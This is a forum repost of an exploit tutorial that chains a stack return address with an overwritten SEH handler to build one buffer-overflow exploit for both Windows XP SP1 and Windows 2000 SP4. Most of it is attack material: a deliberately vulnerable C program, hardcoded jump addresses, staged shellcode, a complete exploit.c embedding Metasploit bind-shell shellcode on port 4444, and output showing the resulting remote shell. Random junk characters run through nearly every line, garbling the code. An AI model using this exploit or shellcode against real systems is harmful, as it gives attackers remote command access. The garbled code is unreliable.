数学建模社区-数学中国

标题: Exploiting Default Exception Handler to Increase Exploit Sta [打印本页]
作者: 韩冰    时间: 2004-11-19 10:39
标题: Exploiting Default Exception Handler to Increase Exploit Sta
The goal of this method is to create a stable exploit that will successfully exploit a buffer overflow vulnerability on multiple operating systems. Every windows application has a default exception handler that is located at the end of the stack. When exploiting a normal buffer overflow vulnerability we overwrite the return address but in this case we will continue overwriting the stack and overwrite the default exception handler as well.( M/ z+ O& ]4 @; {) g
+ \- p& e! J% ~
[Buf] <- Shellcode6 {4 @) l. K( |( K9 Z$ @$ d- g# _3 \
[Return Address] <- jmp register (for Windows XP sp1)
% }: K# Z* H: C: Q[Various Stack Data] <- Junk
5 \% `/ c2 o+ V6 k5 ?' k" [[Pointer To Next SEH] <- "\xEB\x06\xff\xff" jump 6 bytes forward/ ?3 {. j( W9 I1 t0 f/ n& y. ~1 r
[SE Handler] <- jmp register (for Win2k sp4)7 u- A4 P0 K7 N5 ?
[Stage1 Shellcode] <- stage1 shellcode for win2k
+ v* Y* w1 e4 ?; g# V# n' t  I( m+ u8 M. C
If the first return address (Windows XP SP1) is wrong an exception will occur and the default exception handler will be called (Windows 2000 SP4). Thus allowing us to create a stable exploit with two return addresses
' @0 A/ q. K8 j2 l
# Z3 u  ^1 y1 p* vNecessary Tools:8 G: u. E: |* d0 T# Y( D+ T
- OllyDBG0 I$ w$ g! L0 T
- C/C++ Compiler2 ]8 F! m% q" R) T
- nasm
7 j/ U$ B" O4 p; }- Sac8 {: N5 x$ Z! P8 C

4 t$ B' @1 J9 J0 ^- w% C' U+ YVulnerable Code:
( v* Z: I7 w/ g: g: l* W//lamebuf.c1 g& `) u9 u1 O0 g! x
#include<stdio.h>1 }" h. A# s) O4 c( |( h/ X. m& `  M7 s
#include<string.h>
' v# r& [  E) S3 E8 Q0 f+ [- b+ r& h#include<windows.h>
4 l- g, ~! Q8 ?7 dint main(int argc,char *argv[]){# @8 Y( B$ v  w; P& `8 e* @. X

9 R- a" t/ h0 r" G: vchar buf[512];
' O6 ~* X5 G9 d, y* D! D- o, J' ochar buf1[1024]; // <- simulate a stack
" D, X& L% k4 U' ]5 q//DebugBreak();# N( W/ k& y, i3 W! w
if (argc != 2){ return -1; }
! b6 c( W% o9 ]) W" \1 W
7 I' n3 s8 ^. cstrcpy(buf,argv[1]);
( w0 k( y. X6 Breturn 0x0;+ i/ A; g/ N3 h+ V3 g/ l' y, }
}
0 U% m' n1 |% N& C
! b# C2 c" X1 [& uGetting Started:" V! ]5 T$ T- z" s" y, [) X7 ]
Before writing the exploit, lets see what happens when we overflow this application with 1600 bytes. The application crashed in the following state of registers:
* j6 N3 v. M" @% y: u; n9 N3 h) ?$ d+ q
EAX 00000000' g3 L, T/ B7 d) F
ECX 00321404- Q8 C! u! D5 V/ Z
EDX 00414141) N) J/ W3 `3 p4 g! Z  a
EBX 7FFDF000- ?2 d! o! @; m& x& }. k$ s& h
ESP 0012FF88 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". s) U2 \4 F7 ~( r- R
EBP 414141415 i$ ~, ]. Z3 L2 r% g. y
ESI 77D4595F
1 e, \! R* B- H5 ?# YEDI 77F59037 ntdll.77F59037' n% `' [5 K6 G# X
EIP 41414141
  |# |) M0 C5 B1 m
# w" `7 y1 O+ ?1 l5 _: xLets take a look at the stack and see what happened to the default exception handler:0 U& O5 A. o' _+ g+ M+ e; u6 ~% f
0x0012FFB0 41414141 Pointer to next SEH Record& y6 |* r! `; T3 x1 X$ }
0x0012FFB4 41414141 SE Handler0 l; ^9 E. g0 b

- |# @* D) U) u  `+ X/ yWe successfully overwrote the return address and the default exception handler." q8 v4 h8 M* D4 f% a. M8 v- _

/ a! {4 n" O  U9 e( W8 APrimary Return Address (Windows XP SP1 EN):# U2 v; p4 j8 q. x- h
The first return address will be called as in a normal stack overflow. We can see that esp points to user-input, we will use that as our first stage shellcode. The return address will be 0x77F8AC16 (jmp esp on Windows XP SP1 En), and our first stage shellcode will be:7 _$ s6 k* P4 Z6 _) L
"\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4"4 n6 V8 B; k5 f- \
2 w7 P! C( s2 c$ h- B3 T
Secondary Return Address (Windows 2000 SP4 EN):( Y: S2 b& s. X" i$ @! f! q" @
The secondary return address will be called as in a normal SEH return. The return address will be 0x77F92A9B (jmp ebx on Win2k Sp4 En), and our first stage shellcode will be:
* ]+ I2 e6 a3 {( a' [# u5 K$ z) P( f* i6 V"\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1"
1 J& i6 M* r6 T/ _4 ?+ H6 i. S, [! v' ?
Proof Of Concept:
8 {* _" g% o6 w. q( g' K' T// exploit.c9 M( O: H8 n+ G' b2 ^( w, Q8 o9 }" F
// Tal zeltzer - [Double Return] //; F  i, Y8 w1 J$ _; w5 U4 E

1 B* z) U5 g2 Y9 r( X* `#include<stdio.h>
# |) ]* b' D$ W9 c#include<string.h>7 g5 H6 s* [+ u+ y& ]8 R. X
#include<windows.h>" u' ]. |! o& y9 }4 W0 ^

, W2 B) E5 g( A- C  D#define RET_XP 0x77F8AC16 // WinXP Sp1 English - jmp esp
8 u$ c4 N1 a% g. d5 \$ {- Y" W- }#define RET_WIN2K 0x77F92A9B // Win2k Sp4 English - jmp ebx
+ k5 R( L7 E) m+ Y! g6 r% ~
$ G4 W- r9 l6 n: b- @! f; x// Stage1 For WinXP Sp1 English/ g9 W) A8 W& J6 O- E$ ^
unsigned char stage1_1[] = "\x89\xE1\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE4";; z% m# S* q+ N) c' @

! R: G; \+ `5 E) E5 @- a5 Y2 e% L// Stage1 For Win2k Sp4 English. ~. ~! {1 g: U3 F& [
unsigned char stage1_2[] = "\x89\xC1\xFE\xCD\xFE\xCD\xFE\xCD\x89\xCC\xFF\xE1";
% Y& J+ A( `; F0 R8 S, o0 S$ }# W' K$ k  }
// win32_bind - Encoded Shellcode [\x00\x0a\x09] [ EXITFUNC=seh LPORT=4444 Size=399 ] _blank>http://metasploit.com
( F" V( k2 Y# z* O. V# I: Kunsigned char shellcode[] =2 w( }. C  S. H, z2 h5 z
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x4f\x85"
1 q9 ]& W2 c$ m. Y"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x85\x7c\xcd\x19"
) N+ [3 ^0 G8 H7 [% a5 \- b2 b"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x84\xc5\x13\x05"( d9 f+ W. u' L7 g) ]: I) ~
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x84\xc1\xa9\xb0"
1 a- v8 l( b; U  v* ~% `4 B" f( U"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x42\xc4\x6a\x74"- }3 k4 G$ J$ R$ V+ a/ L" d
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x89\x64\x13\x15"
6 R" n% \' O! H; {. v+ d"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\xda\x71\xc5\x14"
3 Y3 S2 C. ~1 r5 k"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x89\xa4\xc3\x53"8 b, M* ?% S, V$ y
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x53\xa6\x5f\xce"! E0 E! c- D, }3 j/ i
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x85\x2f\x98\xdf"7 O+ s( [3 N+ B% N% Q9 f
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\xcc\xa9\xd1\xeb"
' `5 g4 _0 J+ ]0 m/ c"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x68\xd3\xa3\x18"7 n0 _+ ~( [$ u/ [9 t
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x52\xa6\x47\xc6"7 o( n! Z+ A3 [+ Y# Y/ W, c; E
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x7a\x7a\x9c\x16"$ s; e  Z$ o# w* D
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\xb5\x1e\x58\x1f"' Z3 u: \  }, E8 E+ U/ z) r
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\xb4\xf4\xcb\x1c"4 A1 S5 J! B! |2 `( t' Y+ Z' X' h
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\xd0\x0b\xcb\x18"& S6 _1 X- h! W: n0 Z
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\xc6\x62\xdc\x4f") g! ]3 A% j4 y4 \, F4 C! B
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\xdc\xdc\x33\xc8"
/ k5 D) s' [! H# D9 `"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\xa1\x13\x99\x4e"
4 T! P; O6 D2 P+ E0 x) q& e4 G* H"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x08\x6b\xbc\x5f"6 ?& _  d4 m0 l/ w
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x7a\x5a\x98\x27"  @* |4 A; ~4 n2 U0 N9 V% y7 Q  i8 K
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\xf0\x2f\xf0\xe2"
* [. P- J1 A# K) C6 F"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x7a\xfc\x67\x3a"
* u2 Q2 L. z! \, ["\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x7a\xff\x98";
4 M; {) `# {4 G2 y: [
  @+ e5 s, J7 P* n2 d9 }+ `
, }( V9 E( |7 P! C; ~int main(int argc,char *argv[]){# @7 V4 D! |  h/ N: O" W
% q2 Y' |  }; T1 q9 O" X* N# g
char *bufExe[3];3 q8 y7 Z' R# D$ i7 E6 i
char buf[2048];& m5 z1 ^# k2 t- k. G" A, J9 D
bufExe[0] = "lamebuf.exe";" }% v& c2 U" S, A
bufExe[2] = NULL;
7 q, t: k6 p3 v2 e0 e
1 c2 ?9 w, C* A0 Q: Y% vmemset(buf,0x0,sizeof(buf));
9 i* i: B8 l7 gmemset(buf,0x90,1652);( F0 `) N. ^" R4 l  Z$ [5 {# r! ?8 F
memcpy(&buf[24],shellcode,sizeof(shellcode)-1);' i( h& l) z6 ^
) b: q- B" q+ ~% T/ p; L
memcpy(&buf[1544],&stage1_1,sizeof(stage1_1)-1); //WinXP SP1 En - Stage1 Shellcode* e' E9 d$ [5 W, m/ E& o5 G
memcpy(&buf[1592],&stage1_2,sizeof(stage1_2)-1); //Win2k SP4 En - Stage2 Shellcode. N! C# o- c* a; Q, @6 a
/ P; Y" f" }3 Q& z: J9 m& }0 ^3 v
*(unsigned long *)&buf[1540] = RET_XP; // First RET (jmp esp) winXP sp1 en! \1 ]. r& b4 J: O, G1 r2 S
*(unsigned long *)&buf[1584] = 0xcccc06EB; // For win2k - jmp 6 bytes forward to our stage1_2 code+ m6 j: U9 v1 Q5 {1 l6 h# h
*(unsigned long *)&buf[1588] = RET_WIN2K; // Second RET (jmp ebx) win2k sp4 en3 d" O9 @& h) c6 @4 ~

' M( W! H% z5 ^/ s7 X
5 X& S/ \+ X+ k( w: TbufExe[1] = buf;+ S$ w1 v& A0 u
//Execute the vulnerable application( x4 d2 c1 n0 c! C7 P
execve(bufExe[0],bufExe,NULL);
6 V$ W" k9 D1 Y- T& R0 }
1 P' z0 C( |( }) `! qreturn 0x0;
7 s! _' t) O) A# s! J' r& Q1 G9 J}' A  m; o5 h/ \4 Z& W6 S

6 T9 s" |& b4 FExploit under Windows XP SP1:
4 j4 N. n6 V  X0 n3 I# @C:\>exploit
. K, Y( n0 a: ]+ h. BC:\>% [! |. i9 D; N' \6 `2 e* H
C:\>telnet 127.0.0.1 4444
8 F" V- w1 c: r( n$ ?/ ^4 f3 e* A, U1 b8 Y
Microsoft Windows XP [Version 5.1.2600]( Y% D5 W, @! f& P  A3 Z) I
(C) Copyright 1985-2001 Microsoft Corp.7 X/ w( B% o& P) g
2 o( ~& l: Z7 _, y* p1 @
C:\>$ `5 ?# R1 I* K2 l
5 y( G) s7 h. c' M, n/ ]" Z
Exploit under Windows 2000 SP4:
2 F" s0 \9 ]4 S) \. {6 U0 EC:\>exploit
5 e1 K1 o1 K/ m/ fC:\>9 _. {4 X: Y" l+ E$ t* B, w) S
C:\>telnet 127.0.0.1 4444" W6 K" k2 W* _& U4 h2 I! E  R
$ g5 o; e, ^, g. \& V; p% Y
Microsoft Windows 2000 [Version 5.00.2195]0 F9 n. P; `6 E! f+ J/ k& x
(C) Copyright 1985-2000 Microsoft Corp.



欢迎光临 数学建模社区-数学中国 (http://www.madio.net/) Powered by Discuz! X2.5